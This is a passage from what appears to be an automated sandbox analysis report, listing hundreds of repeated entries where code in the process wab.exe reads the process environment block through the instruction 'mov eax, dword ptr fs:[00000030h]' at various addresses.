            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A2349 mov eax, dword ptr fs:[00000030h]4_2_036A2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A2349 mov eax, dword ptr fs:[00000030h]4_2_036A2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A2349 mov eax, dword ptr fs:[00000030h]4_2_036A2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A2349 mov eax, dword ptr fs:[00000030h]4_2_036A2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A2349 mov eax, dword ptr fs:[00000030h]4_2_036A2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A2349 mov eax, dword ptr fs:[00000030h]4_2_036A2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A2349 mov eax, dword ptr fs:[00000030h]4_2_036A2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A2349 mov eax, dword ptr fs:[00000030h]4_2_036A2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A2349 mov eax, dword ptr fs:[00000030h]4_2_036A2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A2349 mov eax, dword ptr fs:[00000030h]4_2_036A2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A2349 mov eax, dword ptr fs:[00000030h]4_2_036A2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A2349 mov eax, dword ptr fs:[00000030h]4_2_036A2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361D34C mov eax, dword ptr fs:[00000030h]4_2_0361D34C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361D34C mov eax, dword ptr fs:[00000030h]4_2_0361D34C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036F5341 mov eax, dword ptr fs:[00000030h]4_2_036F5341
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03619353 mov eax, dword ptr fs:[00000030h]4_2_03619353
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03619353 mov eax, dword ptr fs:[00000030h]4_2_03619353
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A035C mov eax, dword ptr fs:[00000030h]4_2_036A035C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A035C mov eax, dword ptr fs:[00000030h]4_2_036A035C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A035C mov eax, dword ptr fs:[00000030h]4_2_036A035C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A035C mov ecx, dword ptr fs:[00000030h]4_2_036A035C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A035C mov eax, dword ptr fs:[00000030h]4_2_036A035C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A035C mov eax, dword ptr fs:[00000030h]4_2_036A035C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036EA352 mov eax, dword ptr fs:[00000030h]4_2_036EA352
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E132D mov eax, dword ptr fs:[00000030h]4_2_036E132D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E132D mov eax, dword ptr fs:[00000030h]4_2_036E132D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364F32A mov eax, dword ptr fs:[00000030h]4_2_0364F32A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03617330 mov eax, dword ptr fs:[00000030h]4_2_03617330
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A930B mov eax, dword ptr fs:[00000030h]4_2_036A930B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A930B mov eax, dword ptr fs:[00000030h]4_2_036A930B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A930B mov eax, dword ptr fs:[00000030h]4_2_036A930B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365A30B mov eax, dword ptr fs:[00000030h]4_2_0365A30B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365A30B mov eax, dword ptr fs:[00000030h]4_2_0365A30B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365A30B mov eax, dword ptr fs:[00000030h]4_2_0365A30B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361C310 mov ecx, dword ptr fs:[00000030h]4_2_0361C310
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03640310 mov ecx, dword ptr fs:[00000030h]4_2_03640310
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036303E9 mov eax, dword ptr fs:[00000030h]4_2_036303E9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036303E9 mov eax, dword ptr fs:[00000030h]4_2_036303E9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036303E9 mov eax, dword ptr fs:[00000030h]4_2_036303E9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036303E9 mov eax, dword ptr fs:[00000030h]4_2_036303E9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036303E9 mov eax, dword ptr fs:[00000030h]4_2_036303E9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036303E9 mov eax, dword ptr fs:[00000030h]4_2_036303E9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036303E9 mov eax, dword ptr fs:[00000030h]4_2_036303E9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036303E9 mov eax, dword ptr fs:[00000030h]4_2_036303E9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036DF3E6 mov eax, dword ptr fs:[00000030h]4_2_036DF3E6
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036F53FC mov eax, dword ptr fs:[00000030h]4_2_036F53FC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0363E3F0 mov eax, dword ptr fs:[00000030h]4_2_0363E3F0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0363E3F0 mov eax, dword ptr fs:[00000030h]4_2_0363E3F0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0363E3F0 mov eax, dword ptr fs:[00000030h]4_2_0363E3F0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036563FF mov eax, dword ptr fs:[00000030h]4_2_036563FF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036DC3CD mov eax, dword ptr fs:[00000030h]4_2_036DC3CD
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0362A3C0 mov eax, dword ptr fs:[00000030h]4_2_0362A3C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0362A3C0 mov eax, dword ptr fs:[00000030h]4_2_0362A3C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0362A3C0 mov eax, dword ptr fs:[00000030h]4_2_0362A3C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0362A3C0 mov eax, dword ptr fs:[00000030h]4_2_0362A3C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0362A3C0 mov eax, dword ptr fs:[00000030h]4_2_0362A3C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0362A3C0 mov eax, dword ptr fs:[00000030h]4_2_0362A3C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036283C0 mov eax, dword ptr fs:[00000030h]4_2_036283C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036283C0 mov eax, dword ptr fs:[00000030h]4_2_036283C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036283C0 mov eax, dword ptr fs:[00000030h]4_2_036283C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036283C0 mov eax, dword ptr fs:[00000030h]4_2_036283C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036DB3D0 mov ecx, dword ptr fs:[00000030h]4_2_036DB3D0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036433A5 mov eax, dword ptr fs:[00000030h]4_2_036433A5
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036533A0 mov eax, dword ptr fs:[00000030h]4_2_036533A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036533A0 mov eax, dword ptr fs:[00000030h]4_2_036533A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361E388 mov eax, dword ptr fs:[00000030h]4_2_0361E388
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361E388 mov eax, dword ptr fs:[00000030h]4_2_0361E388
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361E388 mov eax, dword ptr fs:[00000030h]4_2_0361E388
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364438F mov eax, dword ptr fs:[00000030h]4_2_0364438F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364438F mov eax, dword ptr fs:[00000030h]4_2_0364438F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036F539D mov eax, dword ptr fs:[00000030h]4_2_036F539D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03618397 mov eax, dword ptr fs:[00000030h]4_2_03618397
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03618397 mov eax, dword ptr fs:[00000030h]4_2_03618397
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03618397 mov eax, dword ptr fs:[00000030h]4_2_03618397
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0367739A mov eax, dword ptr fs:[00000030h]4_2_0367739A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0367739A mov eax, dword ptr fs:[00000030h]4_2_0367739A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03624260 mov eax, dword ptr fs:[00000030h]4_2_03624260
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03624260 mov eax, dword ptr fs:[00000030h]4_2_03624260
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03624260 mov eax, dword ptr fs:[00000030h]4_2_03624260
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036ED26B mov eax, dword ptr fs:[00000030h]4_2_036ED26B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036ED26B mov eax, dword ptr fs:[00000030h]4_2_036ED26B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361826B mov eax, dword ptr fs:[00000030h]4_2_0361826B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03649274 mov eax, dword ptr fs:[00000030h]4_2_03649274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03661270 mov eax, dword ptr fs:[00000030h]4_2_03661270
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03661270 mov eax, dword ptr fs:[00000030h]4_2_03661270
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D0274 mov eax, dword ptr fs:[00000030h]4_2_036D0274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D0274 mov eax, dword ptr fs:[00000030h]4_2_036D0274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D0274 mov eax, dword ptr fs:[00000030h]4_2_036D0274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D0274 mov eax, dword ptr fs:[00000030h]4_2_036D0274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D0274 mov eax, dword ptr fs:[00000030h]4_2_036D0274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D0274 mov eax, dword ptr fs:[00000030h]4_2_036D0274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D0274 mov eax, dword ptr fs:[00000030h]4_2_036D0274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D0274 mov eax, dword ptr fs:[00000030h]4_2_036D0274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D0274 mov eax, dword ptr fs:[00000030h]4_2_036D0274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D0274 mov eax, dword ptr fs:[00000030h]4_2_036D0274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D0274 mov eax, dword ptr fs:[00000030h]4_2_036D0274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D0274 mov eax, dword ptr fs:[00000030h]4_2_036D0274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03619240 mov eax, dword ptr fs:[00000030h]4_2_03619240
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03619240 mov eax, dword ptr fs:[00000030h]4_2_03619240
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365724D mov eax, dword ptr fs:[00000030h]4_2_0365724D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361A250 mov eax, dword ptr fs:[00000030h]4_2_0361A250
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036DB256 mov eax, dword ptr fs:[00000030h]4_2_036DB256
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036DB256 mov eax, dword ptr fs:[00000030h]4_2_036DB256
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03626259 mov eax, dword ptr fs:[00000030h]4_2_03626259
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036F5227 mov eax, dword ptr fs:[00000030h]4_2_036F5227
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361823B mov eax, dword ptr fs:[00000030h]4_2_0361823B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03657208 mov eax, dword ptr fs:[00000030h]4_2_03657208
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03657208 mov eax, dword ptr fs:[00000030h]4_2_03657208
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D12ED mov eax, dword ptr fs:[00000030h]4_2_036D12ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D12ED mov eax, dword ptr fs:[00000030h]4_2_036D12ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D12ED mov eax, dword ptr fs:[00000030h]4_2_036D12ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D12ED mov eax, dword ptr fs:[00000030h]4_2_036D12ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D12ED mov eax, dword ptr fs:[00000030h]4_2_036D12ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D12ED mov eax, dword ptr fs:[00000030h]4_2_036D12ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D12ED mov eax, dword ptr fs:[00000030h]4_2_036D12ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D12ED mov eax, dword ptr fs:[00000030h]4_2_036D12ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D12ED mov eax, dword ptr fs:[00000030h]4_2_036D12ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D12ED mov eax, dword ptr fs:[00000030h]4_2_036D12ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D12ED mov eax, dword ptr fs:[00000030h]4_2_036D12ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D12ED mov eax, dword ptr fs:[00000030h]4_2_036D12ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D12ED mov eax, dword ptr fs:[00000030h]4_2_036D12ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D12ED mov eax, dword ptr fs:[00000030h]4_2_036D12ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036302E1 mov eax, dword ptr fs:[00000030h]4_2_036302E1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036302E1 mov eax, dword ptr fs:[00000030h]4_2_036302E1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036302E1 mov eax, dword ptr fs:[00000030h]4_2_036302E1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036F52E2 mov eax, dword ptr fs:[00000030h]4_2_036F52E2
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036DF2F8 mov eax, dword ptr fs:[00000030h]4_2_036DF2F8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036192FF mov eax, dword ptr fs:[00000030h]4_2_036192FF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0362A2C3 mov eax, dword ptr fs:[00000030h]4_2_0362A2C3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0362A2C3 mov eax, dword ptr fs:[00000030h]4_2_0362A2C3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0362A2C3 mov eax, dword ptr fs:[00000030h]4_2_0362A2C3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0362A2C3 mov eax, dword ptr fs:[00000030h]4_2_0362A2C3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0362A2C3 mov eax, dword ptr fs:[00000030h]4_2_0362A2C3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364B2C0 mov eax, dword ptr fs:[00000030h]4_2_0364B2C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364B2C0 mov eax, dword ptr fs:[00000030h]4_2_0364B2C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364B2C0 mov eax, dword ptr fs:[00000030h]4_2_0364B2C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364B2C0 mov eax, dword ptr fs:[00000030h]4_2_0364B2C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364B2C0 mov eax, dword ptr fs:[00000030h]4_2_0364B2C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364B2C0 mov eax, dword ptr fs:[00000030h]4_2_0364B2C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364B2C0 mov eax, dword ptr fs:[00000030h]4_2_0364B2C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036292C5 mov eax, dword ptr fs:[00000030h]4_2_036292C5
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036292C5 mov eax, dword ptr fs:[00000030h]4_2_036292C5
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361B2D3 mov eax, dword ptr fs:[00000030h]4_2_0361B2D3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361B2D3 mov eax, dword ptr fs:[00000030h]4_2_0361B2D3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361B2D3 mov eax, dword ptr fs:[00000030h]4_2_0361B2D3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364F2D0 mov eax, dword ptr fs:[00000030h]4_2_0364F2D0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364F2D0 mov eax, dword ptr fs:[00000030h]4_2_0364F2D0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036302A0 mov eax, dword ptr fs:[00000030h]4_2_036302A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036302A0 mov eax, dword ptr fs:[00000030h]4_2_036302A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036352A0 mov eax, dword ptr fs:[00000030h]4_2_036352A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036352A0 mov eax, dword ptr fs:[00000030h]4_2_036352A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036352A0 mov eax, dword ptr fs:[00000030h]4_2_036352A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036352A0 mov eax, dword ptr fs:[00000030h]4_2_036352A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E92A6 mov eax, dword ptr fs:[00000030h]4_2_036E92A6
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E92A6 mov eax, dword ptr fs:[00000030h]4_2_036E92A6
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E92A6 mov eax, dword ptr fs:[00000030h]4_2_036E92A6
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E92A6 mov eax, dword ptr fs:[00000030h]4_2_036E92A6
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B72A0 mov eax, dword ptr fs:[00000030h]4_2_036B72A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B72A0 mov eax, dword ptr fs:[00000030h]4_2_036B72A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B62A0 mov eax, dword ptr fs:[00000030h]4_2_036B62A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B62A0 mov ecx, dword ptr fs:[00000030h]4_2_036B62A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B62A0 mov eax, dword ptr fs:[00000030h]4_2_036B62A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B62A0 mov eax, dword ptr fs:[00000030h]4_2_036B62A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B62A0 mov eax, dword ptr fs:[00000030h]4_2_036B62A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B62A0 mov eax, dword ptr fs:[00000030h]4_2_036B62A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A92BC mov eax, dword ptr fs:[00000030h]4_2_036A92BC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A92BC mov eax, dword ptr fs:[00000030h]4_2_036A92BC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A92BC mov ecx, dword ptr fs:[00000030h]4_2_036A92BC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A92BC mov ecx, dword ptr fs:[00000030h]4_2_036A92BC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365E284 mov eax, dword ptr fs:[00000030h]4_2_0365E284
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365E284 mov eax, dword ptr fs:[00000030h]4_2_0365E284
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A0283 mov eax, dword ptr fs:[00000030h]4_2_036A0283
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A0283 mov eax, dword ptr fs:[00000030h]4_2_036A0283
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A0283 mov eax, dword ptr fs:[00000030h]4_2_036A0283
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036F5283 mov eax, dword ptr fs:[00000030h]4_2_036F5283
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365329E mov eax, dword ptr fs:[00000030h]4_2_0365329E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365329E mov eax, dword ptr fs:[00000030h]4_2_0365329E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B9179 mov eax, dword ptr fs:[00000030h]4_2_036B9179
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F172 mov eax, dword ptr fs:[00000030h]4_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03619148 mov eax, dword ptr fs:[00000030h]4_2_03619148
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03619148 mov eax, dword ptr fs:[00000030h]4_2_03619148
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03619148 mov eax, dword ptr fs:[00000030h]4_2_03619148
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03619148 mov eax, dword ptr fs:[00000030h]4_2_03619148
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B4144 mov eax, dword ptr fs:[00000030h]4_2_036B4144
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B4144 mov eax, dword ptr fs:[00000030h]4_2_036B4144
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B4144 mov ecx, dword ptr fs:[00000030h]4_2_036B4144
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B4144 mov eax, dword ptr fs:[00000030h]4_2_036B4144
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B4144 mov eax, dword ptr fs:[00000030h]4_2_036B4144
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03627152 mov eax, dword ptr fs:[00000030h]4_2_03627152
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B8158 mov eax, dword ptr fs:[00000030h]4_2_036B8158
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03626154 mov eax, dword ptr fs:[00000030h]4_2_03626154
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03626154 mov eax, dword ptr fs:[00000030h]4_2_03626154
